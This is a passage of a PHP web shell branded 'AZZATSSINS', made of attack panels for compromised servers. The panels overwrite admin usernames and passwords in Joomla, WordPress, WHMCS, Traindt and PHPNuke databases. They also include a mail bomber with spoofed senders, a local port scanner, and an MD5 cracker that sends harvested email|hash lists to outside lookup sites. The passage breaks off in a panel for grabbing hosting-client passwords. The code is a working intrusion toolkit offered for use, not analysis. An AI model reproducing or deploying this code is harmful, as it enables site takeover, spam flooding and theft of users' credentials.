  1005. <tr><td>&nbsp;&nbsp;New User</td><td>
  1006. <input style='width:270px;' class='inputz' name='admin' value='azzatssins' /></td></tr>
  1007. <tr><td>&nbsp;&nbsp;New Pass </td>
  1008. <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' />&nbsp;</td></tr>
  1009. <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  1010. </td></tr></table><br>";
  1011. } else {
  1012. $localhost = $_POST['localhost'];
  1013. $database  = $_POST['database'];
  1014. $username  = $_POST['username'];
  1015. $password  = $_POST['password'];
  1016. $pwd   = $_POST['pwd'];
  1017. $admin = $_POST['admin'];
  1018. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1019. @mysql_select_db($database) or die(mysql_error());
  1020. $hash = crypt($pwd);
  1021. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
  1022. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
  1023. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
  1024. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
  1025. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
  1026. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
  1027. $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
  1028. $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
  1029. if($SQL){
  1030. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  1031. }
  1032. }
  1033. echo "</div>";
  1034. }
  1035. ?>
  1036. <?php
  1037. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'WPASS')) {
  1038. ?>
  1039. <form action="?&amp;AZZATSSINS=WPASS" method="post">
  1040. <?php
  1041. echo "
  1042. <center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS USER</span> <span class='b8'> CHANGE ]:=O</span></b></nobr><br/><br/> ";
  1043.  
  1044. if(empty($_POST['pwd'])){
  1045. echo "<FORM method='POST'>
  1046. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  1047. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
  1048. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
  1049. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
  1050. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
  1051. <tr><td>&nbsp;&nbsp;User baru</td><td>
  1052. <input style='width:220px;' class='inputz' type='text' name='admin' value='azzatssins' /></td></tr>
  1053. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
  1054. <input style='width:80px;' class='inputz' type='text' name='pwd' value='17081945' />&nbsp;
  1055.  
  1056. <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
  1057. </td></tr> </table><br><br><br><br>
  1058. ";
  1059. }else{
  1060. $localhost = $_POST['localhost'];
  1061. $database  = $_POST['database'];
  1062. $username  = $_POST['username'];
  1063. $password  = $_POST['password'];
  1064. $pwd   = $_POST['pwd'];
  1065. $admin = $_POST['admin'];
  1066. @mysql_connect($localhost,$username,$password) or die(mysql_error());
  1067. @mysql_select_db($database) or die(mysql_error());
  1068.  
  1069. $hash = crypt($pwd);
  1070. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
  1071. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
  1072. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
  1073. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
  1074. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
  1075. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
  1076. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
  1077. if($a4s){
  1078. echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
  1079. }
  1080. }
  1081. echo "</div>";
  1082. }
  1083. if($_GET['AZZATSSINS']=="encrypt"){
  1084. echo "
  1085. <table bgcolor=#cccccc width=\"100%\">
  1086. <tbody><tr><td align=\"right\" width=100>
  1087. <p dir=ltr><b><font color=#990000  size=-2><br><p align=left><center>
  1088.  
  1089. Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
  1090. <form method=\"POST\">
  1091. <font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
  1092. <input type=\"submit\" value=\"Submit\"></form>";
  1093. if(!$_POST['ENCRYPTION']=='')
  1094. {
  1095. $md5 = $_POST['ENCRYPTION'];
  1096.     echo "<font color=gray>MD5 : </font>".md5($md5)."<br>";
  1097.     echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
  1098.     echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
  1099.     echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
  1100.     echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
  1101.     echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br></tbody></tr></td></table>";
  1102.   }
  1103. }
  1104. if($_GET['open']=="ports"){
  1105. $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
  1106.         $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
  1107.         echo("<script type=\"text/javascript\">");
  1108.         echo("function Show(SelectValue){");
  1109.         echo("document.getElementById('RangeDiv').style.display=\"none\";");
  1110.         echo("document.getElementById('SpecificDiv').style.display=\"none\";");
  1111.         echo("if(SelectValue == \"range\")");
  1112.         echo("document.getElementById('RangeDiv').style.display=\"inline\";");
  1113.         echo("if(SelectValue == \"specific\")");
  1114.         echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
  1115.         echo("}</script>");
  1116.         echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
  1117.         echo('<form method="post">');
  1118.         echo('<u>Ports:</u><br /><br />');
  1119.         echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
  1120.         echo('<option value="automatic">Automatic - All Ports</option>');
  1121.         echo('<option value="range">Range of Ports</option>');
  1122.         echo('<option value="specific">Specific Ports</option>');
  1123.         echo('</select><br /><br />');
  1124.         echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
  1125.         echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
  1126.         echo('<input type="submit" id="submit" name="submit" value="Scan" />');
  1127.         echo('</form>');
  1128.         if(isset($_POST['submit'])){
  1129.             $first = "yes";
  1130.             echo("<br /><br /><u>Results</u>:<br />\n");
  1131.  
  1132.             if($_POST['port'] == "range"){
  1133.                 if($rend > $rstart){
  1134.                     for($i=$rstart;$i<$rend;$i++){
  1135.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  1136.                             if($first == "no")
  1137.                                 echo(", ");
  1138.                             echo $i;
  1139.                             $first = "no";
  1140.                         }
  1141.                     }
  1142.                     echo(".");
  1143.                 }
  1144.                 else{
  1145.                     echo("Range start number can't be bigger than the end number.");
  1146.                 }
  1147.             }
  1148.             else if($_POST['port'] == "specific"){
  1149.                 $list = explode(" ",$_POST['specific']);
  1150.                 foreach($list as $i){
  1151.                     if(is_numeric($i)){
  1152.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  1153.                             if($first == "no")
  1154.                                 echo(", ");
  1155.                             echo $i;
  1156.                             $first = "no";
  1157.                         }
  1158.                     }
  1159.                 }
  1160.                 echo(".");
  1161.             }
  1162.             else{
  1163.                 for($i=0;$i>=0;$i++){
  1164.                     if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  1165.                         if($first == "no")
  1166.                             echo(", ");
  1167.                         echo $i;
  1168.                         $first = "no";
  1169.                     }
  1170.                 }
  1171.                 echo(".");
  1172.             }
  1173.         }
  1174. }
  1175. if($_GET['AZZATSSINS']=="BOMAIL"){
  1176.  ?>
  1177. <?php
  1178. /**
  1179. AZZATSSINS
  1180. **/
  1181.  
  1182. $kontol = 'Mail Bomber Siap Siaga...';
  1183.  
  1184. function boombardir($text){
  1185.     if (!get_magic_quotes_gpc()){
  1186.         return $text;
  1187.     }
  1188.     return stripslashed($text);
  1189. }
  1190. if(isset($_POST['kirim_email'])){
  1191.     $mail_to = $_POST['mail_to'];
  1192.     $fromname = $_POST['from_name'];
  1193.     $fromaddress = $_POST['mail_from'];
  1194.     $mail_subject = $_POST['mail_subject'];
  1195.     $mail_content = boombardir($_POST['mail_content']);
  1196.  
  1197.     $fuckline = "\n\t";
  1198.     $headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
  1199.  
  1200.     if (($_POST['banyak_email']) <=1) {
  1201.         if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
  1202.             $kontol = "email sent to $mail_to";
  1203.         }
  1204.         else $kontol = "Mail Sending is <font color=red> Failed </font> .";
  1205.     }
  1206.     elseif (($_POST['banyak_email']) > 1){
  1207.         $intibom = $_POST['banyak_email'];
  1208.         $kabehe = 0; $kabehekirim=0; $msgtf=0;
  1209.         for ($i=1; $i <= $intibom; $i++) {
  1210.             $acakjudul = substr(md5($i."slackerc0de"),-4);
  1211.             $mailsubject = $mail_subject." - ".$acakjudul;
  1212.             if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
  1213.                 $kabehekirim++;
  1214.             } else {
  1215.                 $msgtf++;
  1216.             }
  1217.             $kabehe++;
  1218.         }
  1219.     $kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
  1220.     }
  1221. }
  1222. ?>
  1223. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  1224. <br /><br />
  1225. <form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
  1226. <table style="padding: 0 0 0 30px">
  1227. <tr><td><br />
  1228.     <table style="padding: 0 0 0 30px">
  1229.         <tr><td width="100">Target eMail :<td width="300">
  1230.             <input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
  1231.         </tr></td>
  1232.         <tr><td>Sender Name :<td width="300">
  1233.             <input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
  1234.         </tr></td>
  1235.         <tr><td>Sender eMail :<td width="300">
  1236.             <input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
  1237.         </tr></td>
  1238.         <tr><td>Subject :<td width="300">
  1239.             <input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
  1240.         </tr></td>
  1241.         <tr><td>Total of Send :<td width="300">
  1242.             <input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
  1243.             <input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
  1244.         </tr></td>
  1245.     </table>
  1246. </td></tr>
  1247. <tr><td><br />
  1248. Message :
  1249. <center>
  1250.     <textarea name="mail_content" cols="60" rows="8" >
  1251.         <?php
  1252.             if ($mail_content) {
  1253.                 echo "mail_content";
  1254.             }
  1255.         ?>
  1256.     </textarea>
  1257. </center>
  1258. </td></tr>
  1259. </table>
  1260. </form><br />
  1261. <div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
  1262.     <?php
  1263. echo "$kontol";
  1264. ?>
  1265. <?php }
  1266.  
  1267. if($_GET['whmcs']=="passchanger"){
  1268. ?>
  1269. <p><br/><body>
  1270. <center><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
  1271. <p><form method="post">
  1272. <table border=1>
  1273. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  1274. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  1275. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  1276. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  1277. <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
  1278. <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="azzatssins" name="userbaru"></td></tr>
  1279. <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="17081945" name="passbaru"></td></tr>
  1280.  
  1281. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1282. </table>
  1283. <br>
  1284. </form>
  1285. </center>
  1286.  
  1287. <?php
  1288. if(isset($_POST['plapon'])) {
  1289. $anu1 = $_POST['anu1'];
  1290. $anu2 = $_POST['anu2'];
  1291. $anu3 = $_POST['anu3'];
  1292. $anu4 = $_POST['anu4'];
  1293. @mysql_connect($anu1,$anu2,$anu3);
  1294. @mysql_select_db($anu4);
  1295.  
  1296. $idmaho=str_replace("\'","'",$idmaho);
  1297. $target_id = $_POST['idmaho'];
  1298. $userbaru=str_replace("\'","'",$userbaru);
  1299. $ganti_user = $_POST['userbaru'];
  1300. $passbaru=str_replace("\'","'",$passbaru);
  1301.  
  1302. $hash_pass = $_POST['passbaru'];
  1303. $ganti_pass = md5($hash_pass);
  1304.  
  1305. $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
  1306. $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
  1307.  
  1308. $udah_ganteng=@mysql_query($colox);
  1309. $udah_ganteng=@mysql_query($coloxx);
  1310. if($udah_ganteng)
  1311. {
  1312. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1313. }
  1314. }
  1315. }
  1316.  
  1317.  
  1318. if($_GET['md5']=="decrypter"){
  1319. set_time_limit(0);
  1320. ?>
  1321. <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
  1322. <script type="text/JavaScript">
  1323. $(document).ready(function(){
  1324. $('pre').fadeIn(3000);
  1325.  
  1326. $('input[type="text"]').click(function(){
  1327. $(this).val('');
  1328. });
  1329.  
  1330.  
  1331.  
  1332. });
  1333.  
  1334. </script>
  1335.  
  1336. <?
  1337. if(!empty($_POST['password'])){
  1338. set_time_limit(0);
  1339. $password = nl2br($_POST['password']);
  1340.  
  1341. $ex = explode("<br />",$password);
  1342.  
  1343. $total_checked = 0;
  1344. $total_cracked = 0;
  1345. $total_failed  = 0;
  1346. $total_not_md5 = 0;
  1347.  
  1348. foreach($ex as $cracking_password){
  1349. $total_checked++;
  1350. $cracking_passwords   = explode("|",$cracking_password);
  1351. $cracking_password    = explode("|",$cracking_password);
  1352. $cracking_password    = $cracking_password[1];
  1353. echo $cracking_passwords[0]."|";
  1354. $cracking_password    = trim($cracking_password);
  1355. $regex = "/[a-z0-9]{32}/i";
  1356.  
  1357. if(preg_match($regex,$cracking_password)){
  1358. $curl_crack = curl_init();
  1359.  
  1360. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5online.net");
  1361. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1362. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"pass=".$cracking_password."&option=hash2text&send=Submit");
  1363. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1364. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1365. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1366. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1367.  
  1368.  
  1369. $exec = curl_exec($curl_crack);
  1370.  
  1371.  
  1372. if(preg_match("/pass : (.*)/",$exec,$cracked)){
  1373. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font>";
  1374. $total_cracked++;
  1375. flush();
  1376. }else{
  1377.  
  1378. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5decryption.com");
  1379. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1380. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&submit=Decrypt+It%21");
  1381. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1382. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1383. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1384. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1385. $exec = curl_exec($curl_crack);
  1386.  
  1387.  
  1388.  
  1389. if(preg_match("/<font size=.*>(.+)<\/font>/",$exec,$cracked)){
  1390. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1391. $total_cracked++;
  1392. flush();
  1393. }else{
  1394. $curl_crack = curl_init();
  1395. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5pass.info");
  1396. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1397. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password."&get_pass=Get+Pass");
  1398. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1399. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1400. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1401. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1402.  
  1403.  
  1404.  
  1405. $exec = curl_exec($curl_crack);
  1406.  
  1407. if(preg_match("/Password - <b>(.*)<\/b>/",$exec,$cracked)){
  1408. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1409. $total_cracked++;
  1410. flush();
  1411. }else{
  1412. $curl_crack = curl_init();
  1413. CURL_SETOPT($curl_crack,CURLOPT_URL,"http://md5.noisette.ch");
  1414. CURL_SETOPT($curl_crack,CURLOPT_POST,True);
  1415. CURL_SETOPT($curl_crack,CURLOPT_POSTFIELDS,"hash=".$cracking_password);
  1416. CURL_SETOPT($curl_crack,CURLOPT_RETURNTRANSFER,True);
  1417. CURL_SETOPT($curl_crack,CURLOPT_FOLLOWLOCATION,True);
  1418. curl_setopt($curl_crack, CURLOPT_CONNECTTIMEOUT ,9000);
  1419. curl_setopt($curl_crack, CURLOPT_TIMEOUT, 9000);
  1420.  
  1421.  
  1422.  
  1423. $exec = curl_exec($curl_crack);
  1424.  
  1425.  
  1426.  
  1427. if(preg_match('/= md5\("(.*)"\)/',$exec,$cracked)){
  1428. echo "<font size='2' color='green'><b>".$cracked[1]."</b></font><br />";
  1429. $total_cracked++;
  1430. flush();
  1431. }else{
  1432.  
  1433. echo "<font size='2' color='red'><b>Not Found</b></font><br />";
  1434. $total_failed++;
  1435. flush();
  1436.  
  1437. }// Next update put the fifth website here
  1438.  
  1439. }
  1440. }
  1441.  
  1442.  
  1443.  
  1444.  
  1445.  
  1446.  
  1447.  
  1448.  
  1449.  
  1450.  
  1451.  
  1452.  
  1453. }
  1454. }
  1455.  
  1456. else{
  1457. $total_not_md5++;
  1458. echo $cracking_password."<br />";
  1459. flush();
  1460. continue;
  1461. }
  1462. //close curl //curl_close($curl_crack);
  1463. }
  1464.  
  1465. echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'><br><font size='2'>Total Password Checked : </font><b><font size='2'>".$total_checked."</font></b><br><font size='2' color='green'> Total Password Cracked : </font><font size='2'>".$total_cracked." </font><br><font size='2' color='red'> Total Password Faild : </font><b><font size='2'>".$total_failed."</font></b>"." </font><br><font size='2' color='orange'> Total Note Md5 : </font><b><font size='2'>".$total_not_md5."</font></b>";
  1466. }else{
  1467. ?>
  1468. <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  1469. <center>
  1470. <form method="POST">
  1471.  
  1472.  
  1473. </textarea> <textarea cols='70' rows='15' name="password" placeholder="EMAIL|MD5"></textarea>
  1474.  
  1475. <br><br>
  1476. <input type="submit" name="crack" value="Crack Password">
  1477. <br>
  1478. </form>
  1479. </center>
  1480. <?
  1481. }}
  1482.  
  1483. if($_GET['traindt']=="login"){
  1484. set_time_limit(0);
  1485. echo "<html><head><title>TraindtUpLoginChanger</title></head>";
  1486. echo "<body><center>
  1487. <h2>AZZATSSINS</h2>
  1488. <h3>TraindtUp UsEr-PaSs FuCk3r</h3>
  1489. <form method=POST action=''>
  1490. DB HOST<br/>
  1491. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  1492. DB NAME<br/>
  1493. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1494. DB USER<br/>
  1495. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1496. DB PASSWORD<br/>
  1497. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  1498. <hr style='color:lime;'> <p>TARGET ID ADMIN MAHO<br/>
  1499. <input value='1' style='color:lime;background-color:#000000' type=text name=idmaho size='20'><br/>
  1500. NEW ADMIN LOGIN USER<br/>
  1501. <input value=admin-ganteng style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1502. NEW ADMIN LOGIN PASS<br/>
  1503. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  1504.  
  1505. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  1506.  
  1507. $anu1 = $_POST['anu1'];
  1508. $anu2 = $_POST['anu2'];
  1509. $anu3 = $_POST['anu3'];
  1510. $anu4 = $_POST['anu4'];
  1511. @mysql_connect($anu1,$anu3,$anu4);
  1512. @mysql_select_db($anu2);
  1513.  
  1514. $idmaho=str_replace("\'","'",$idmaho);
  1515. $target_id = $_POST['idmaho'];
  1516.  
  1517. $userbaru=str_replace("\'","'",$userbaru);
  1518. $ganti_user = $_POST['userbaru'];
  1519.  
  1520. $passbaru=str_replace("\'","'",$passbaru);
  1521. $hash_pass = $_POST['passbaru'];
  1522. $ganti_pass = md5($hash_pass);
  1523.  
  1524. $sodok1 = "UPDATE admin SET admin_user ='".$ganti_user."' WHERE admin_id ='".$target_id."'";
  1525. $sodok2 = "UPDATE admin SET admin_password ='".$ganti_pass."' WHERE admin_id ='".$target_id."'";
  1526.  
  1527. $oke=@mysql_query($sodok1);
  1528. $oke=@mysql_query($sodok2);
  1529. if($oke)
  1530. {
  1531. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  1532. }
  1533. }
  1534.  
  1535. if($_GET['nuke']=="login"){
  1536. set_time_limit(0);
  1537. echo "<html><head><title>PHPNukeLoginChanger</title></head>";
  1538. echo "<body><center>
  1539. <h2>AZZATSSINS</h2>
  1540. <h3>PHPNuke UsEr-PaSs FuCk3r</h3>
  1541. <form method=POST action=''>
  1542. DB HOST<br/>
  1543. <input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
  1544. DB NAME<br/>
  1545. <input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
  1546. DB USER<br/>
  1547. <input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
  1548. DB PASSWORD<br/>
  1549. <input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
  1550. <hr style='color:lime;'>
  1551.  
  1552. TARGET PREFIX<br/>
  1553. <input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
  1554. NEW ADMIN LOGIN USER<br/>
  1555. <input value=admin style='color:lime;background-color:#000000' type=text name=userbaru size='20'><br/>
  1556. NEW ADMIN LOGIN PASS<br/>
  1557. <input value=dm style='color:lime;background-color:#000000' type=password name=passbaru size='20'><br/><p>
  1558.  
  1559. <input style='color:lime;background-color:#000000' type=submit value='[~] GANTENGIN COK [~] ' ></form>";
  1560.  
  1561. $anu1 = $_POST['anu1'];
  1562. $anu2 = $_POST['anu2'];
  1563. $anu3 = $_POST['anu3'];
  1564. $anu4 = $_POST['anu4'];
  1565. @mysql_connect($anu1,$anu3,$anu4);
  1566. @mysql_select_db($anu2);
  1567.  
  1568. $userbaru=str_replace("\'","'",$userbaru);
  1569. $ganti_user = $_POST['userbaru'];
  1570. $passbaru=str_replace("\'","'",$passbaru);
  1571. $hash_pass = $_POST['passbaru'];
  1572. $ganti_pass = md5($hash_pass);
  1573.  
  1574. $prefix = $_POST['prefix'];
  1575. $table_name1 = $prefix."users" ;
  1576. $table_name2 = $prefix."authors" ;
  1577.  
  1578. $okenuke1 = "UPDATE $table_name1 SET username ='".$ganti_user."' WHERE user_id ='2'";
  1579. $okenuke2 = "UPDATE $table_name1 SET user_password ='".$ganti_pass."' WHERE user_id ='2'";
  1580. $okenuke3= "UPDATE $table_name2 SET aid ='".$ganti_user."' WHERE radminsuper ='1'";
  1581. $okenuke4 = "UPDATE $table_name2 SET pwd ='".$ganti_pass."' WHERE radminsuper ='1'";
  1582.  
  1583. $oke=@mysql_query($okenuke1);
  1584. $oke=@mysql_query($okenuke2);
  1585. $oke=@mysql_query($okenuke3);
  1586. $oke=@mysql_query($okenuke4);
  1587. if($oke)
  1588. {
  1589. echo "<center><font color='lime'>SUKSES BOS GANTENG :P</font>";
  1590. }
  1591. }
  1592.  
  1593. if($_GET['ceck']=="whmcs"){
  1594. set_time_limit(0);
  1595. ?>
  1596.  <p><br/><body>
  1597. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ CHECK WHMCS</span> <span class="b8">LICENSE & VERSION ]:=O</span></b></nobr><br/><br/>
  1598. <p><form method="post">
  1599. <table border=1>
  1600. <tr><td>Hosting Site </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" value="http://" name="url"></td></tr>
  1601. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr></table>
  1602. <br></form></center>
  1603.  
  1604. <?php
  1605. @error_reporting(0);
  1606. @ini_set('log_errors',0);
  1607. @ini_set('error_log',NULL);
  1608. if(isset($_POST['plapon'])){
  1609. $target = $_POST['url'];
  1610. $bukadikitjoss = fopen("$target/?licensedebug","r");
  1611. $hasil = '';
  1612. while (!feof($bukadikitjoss)) {
  1613. $hasil .= fread($bukadikitjoss, 8192);
  1614. }
  1615. echo "<center><textarea style='color:#FF0000;background-color:#000000' cols='40' rows='15'>$hasil</textarea>";
  1616. }
  1617. echo "</table>";
  1618. }
  1619.  
  1620. if($_GET['whmcs']=="client"){
  1621. set_time_limit(0);
  1622. ?>
  1623. <p><br/><body>
  1624. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ GRAB PASSWORD</span> <span class="b8">CLIENT HOSTING ]:=O</span></b></nobr><br/><br/>
  1625. <p><form method="post">
  1626. <table border=1>
  1627. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  1628. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  1629. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  1630. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  1631. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1632.  
